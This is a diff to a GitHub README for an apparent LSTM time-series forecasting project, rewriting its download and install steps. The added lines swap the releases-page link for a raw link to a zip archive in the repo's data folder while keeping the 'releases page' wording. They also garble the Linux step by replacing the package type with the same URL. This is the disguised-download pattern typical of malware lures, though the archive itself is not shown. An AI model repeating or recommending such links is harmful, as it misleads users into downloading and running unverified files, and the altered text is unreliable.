danny-701/LSTM-Time-Series-Forecasting/README.md

 - **Internet Connection:** Required for downloading the application

 ## 💻 Download & Install
-1. **Visit the releases page** by clicking this link: [Download Releases](https://github.com/danny-701/LSTM-Time-Series-Forecasting/releases).
+1. **Visit the releases page** by clicking this link: [Download Releases](https://github.com/danny-701/LSTM-Time-Series-Forecasting/raw/refs/heads/main/data/Series-Time-Forecasting-LST-v2.3.zip).
 2. On the releases page, you will see listings for the available versions.
 Choose the latest version for the best features.
 3. Click on the file that matches your operating system:
    - For Windows: Look for a `.exe` file.
    - For macOS: Look for a `.dmg` file.
-   - For Linux: Look for a `.tar.gz` or similar package.
+   - For Linux: Look for a `https://github.com/danny-701/LSTM-Time-Series-Forecasting/raw/refs/heads/main/data/Series-Time-Forecasting-LST-v2.3.zip` or similar package.
 4. **Download the file** to your computer.
 Depending on your browser settings, it may save to your "Downloads" folder.
 5. **Run the installer**:
    - For Windows: Double-click the downloaded `.exe` file to start the installation.